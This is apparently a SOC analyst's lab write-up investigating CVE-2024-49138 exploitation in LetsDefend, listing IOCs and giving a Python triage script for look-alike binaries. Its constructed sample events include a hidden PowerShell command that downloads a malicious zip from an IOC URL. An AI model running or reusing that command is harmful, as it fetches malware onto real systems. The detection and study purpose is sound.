
CVE-2024-49138 PoC: Microsoft Windows Common Log File System Driver Security Vulnerability

Source
Related vulnerability
Title: Microsoft Windows Common Log File System Driver Security Vulnerability (CVE-2024-49138)
Description: Microsoft Windows Common Log File System Driver is Microsoft's Common Log File System (CLFS) API, which provides a high-performance, general-purpose log file subsystem that dedicated client applications can use and that multiple clients can share to optimize log access. The Microsoft Windows Common Log File System Driver contains a security vulnerability. An attacker who exploits it can elevate privileges. The following products and versions are affected: Windows Server 2008 R2 for x64-
Description
Hands-on SOC investigation of CVE-2024-49138 using LetsDefend, VirusTotal, Hybrid Analysis, TrueFort, and ChatGPT.
Introduction
# LetsDefend Investigation: CVE-2024-49138

## 🔍 Overview

Hands-on SOC investigation and incident response simulation using [LetsDefend](https://letsdefend.io/), focused on a real-world exploitation of **CVE-2024-49138**, a local privilege escalation vulnerability in the Windows CLFS driver.

## 📅 Event Details

- **Event ID**: 313
- **Incident Type**: Privilege Escalation
- **Event Time**: Jan 22, 2025
- **Hostname**: Victor
- **IP Address**: 172.16.17.207
- **Malicious Binary**: `svohost.exe`
- **Parent Process**: `powershell.exe`
- **Suspicious Command**: `\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` (this is the standard command line Windows uses to attach a console host to a console-mode process, so it is benign on its own; its significance comes from the process tree it appears in, not from the command line itself)

## 🛠️ Tools Used

- [VirusTotal](https://virustotal.com)
- [Hybrid Analysis](https://www.hybrid-analysis.com)
- [TrueFort](https://www.truefort.com)
- [ChatGPT](https://chat.openai.com) — For decoding PowerShell commands and analyzing behavior
- LetsDefend Lab Environment

## 🧠 Indicators of Compromise

- **Hash**: `b432dcf4a0f0b601b1d79848467137a5e25cab5a0b7b1224be9d3b6540122db9`
- **Malicious URL**: `https://files-ld.s3.us-east-2.amazonaws.com/service-installer.zip`
- **Malicious IP**: `185.107.56.141`

## 🧩 Key Takeaways

- Identified a fake system binary (`svohost.exe`, a one-character look-alike of the legitimate `svchost.exe`) used for privilege escalation.
- Mapped activity to MITRE ATT&CK techniques.
- Used a layered toolset for full visibility (EDR, sandboxing, static/dynamic analysis, AI).
- Gained insight into PowerShell-based malware delivery methods.
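To make the look-alike-binary observation and the IOC list above repeatable, here is an added example in Python (not part of the original write-up or of the LetsDefend lab): a small triage routine over process-creation events that flags process names one edit away from a legitimate system binary, system-binary names running outside System32/SysWOW64, a look-alike parent, and command lines or hashes that match the IOCs listed above. The sample events, file paths and PowerShell command line are constructed for illustration; only the hash, URL and IP values are taken from this page.

```python
"""Process-creation triage: look-alike system binaries plus IOC matching.

The SAMPLE_EVENTS below are constructed to mimic Sysmon Event ID 1 fields;
they are not telemetry from the LetsDefend lab.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Windows binaries that malware commonly impersonates by name.
# explorer.exe is deliberately absent: it legitimately lives in C:\Windows.
LEGIT_SYSTEM_BINARIES = {
    "svchost.exe", "conhost.exe", "lsass.exe", "csrss.exe", "smss.exe",
    "winlogon.exe", "wininit.exe", "services.exe", "dllhost.exe",
}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# IOCs as listed in the write-up.
IOC_SHA256 = {"b432dcf4a0f0b601b1d79848467137a5e25cab5a0b7b1224be9d3b6540122db9"}
IOC_IPS = {"185.107.56.141"}
IOC_URLS = {"https://files-ld.s3.us-east-2.amazonaws.com/service-installer.zip"}

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")


@dataclass
class ProcEvent:
    host: str
    image: str          # full path of the new process
    parent_image: str   # full path of the parent process
    command_line: str
    sha256: str = ""


def normalize_path(path: str) -> str:
    """Lower-case, backslash-only, and strip the NT object prefix \\??\\ ."""
    p = path.replace("/", "\\").lower()
    return p[4:] if p.startswith("\\??\\") else p


def basename(path: str) -> str:
    return normalize_path(path).rsplit("\\", 1)[-1]


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance; a distance of 1 catches typosquats like svohost.exe."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(name: str) -> Optional[str]:
    """Return the legitimate binary this name imitates, or None for exact/unrelated names."""
    name = name.lower()
    if name in LEGIT_SYSTEM_BINARIES:
        return None
    for legit in sorted(LEGIT_SYSTEM_BINARIES):
        if edit_distance(name, legit) == 1:
            return legit
    return None


def triage(ev: ProcEvent) -> List[str]:
    """Return human-readable findings for one process-creation event."""
    findings = []
    name, parent = basename(ev.image), basename(ev.parent_image)
    path = normalize_path(ev.image)

    target = lookalike_of(name)
    if target:
        findings.append(f"'{name}' is one edit away from system binary '{target}'")
    if name in LEGIT_SYSTEM_BINARIES and not path.startswith(SYSTEM_DIRS):
        findings.append(f"system binary name '{name}' launched from '{ev.image}'")
    if lookalike_of(parent):
        findings.append(f"spawned by look-alike parent '{parent}'")
    if ev.sha256.lower() in IOC_SHA256:
        findings.append("SHA-256 matches a known IOC")
    for ip in IPV4_RE.findall(ev.command_line):
        if ip in IOC_IPS:
            findings.append(f"command line references IOC IP {ip}")
    for url in URL_RE.findall(ev.command_line):
        if url.rstrip("'\"),;") in IOC_URLS:
            findings.append(f"command line references IOC URL {url}")
    return findings


def triage_all(events: List[ProcEvent]) -> List[Tuple[str, List[str]]]:
    """(basename, findings) for every event that produced at least one finding."""
    return [(basename(ev.image), f) for ev in events if (f := triage(ev))]


# Constructed sample events modelled on the chain described in the write-up.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
DROP = r"C:\Users\victor\AppData\Local\Temp\svohost.exe"
SAMPLE_EVENTS = [
    ProcEvent("Victor", PS, r"C:\Windows\explorer.exe",
              "powershell.exe -nop -w hidden -c \"iwr https://files-ld.s3.us-east-2.amazonaws.com/service-installer.zip -OutFile $env:TEMP\\si.zip\""),
    ProcEvent("Victor", DROP, PS, DROP,
              "b432dcf4a0f0b601b1d79848467137a5e25cab5a0b7b1224be9d3b6540122db9"),
    ProcEvent("Victor", r"\??\C:\Windows\system32\conhost.exe", DROP,
              r"\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent("Victor", r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\services.exe",
              r"C:\Windows\System32\svchost.exe -k netsvcs -p", "0" * 64),
]

if __name__ == "__main__":
    for proc, hits in triage_all(SAMPLE_EVENTS):
        print(proc)
        for hit in hits:
            print("  -", hit)
```

Note that the legitimate `svchost.exe` event produces no findings and the `conhost.exe` event is flagged only because of its parent: the conhost command line itself is the normal one Windows generates, which is why the rule looks at the process tree rather than at that string.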

## 🏁 Outcome

Successfully triaged, investigated, and documented the attack chain leveraging CVE-2024-49138. This lab helped reinforce my skills in incident response, behavioral analysis, and threat detection.

## 🔎 Investigation Screenshots

### Alert Triggered in LetsDefend
![Alert Screenshot](/Alert-Panel.png)

### VirusTotal Result for Malicious Hash
![VirusTotal](/VirusTotal.png)

### 🔬 Process Tree Analysis
![Process Analysis](/Process.png)

### 🧪 PowerShell & AbuseIPDB Usage
![AbuseIPDB](/AbuseIPDB.png)

### 📋 Incident Notes
![Notes](/Note.png)

### 🪟 Windows Artifacts
![Microsoft Artifact](/Microsoft.png)

### ✅ Final Wrap-up / Task Marked
![Final](/Mark.png)


---

> “Getting 1% better every day.”
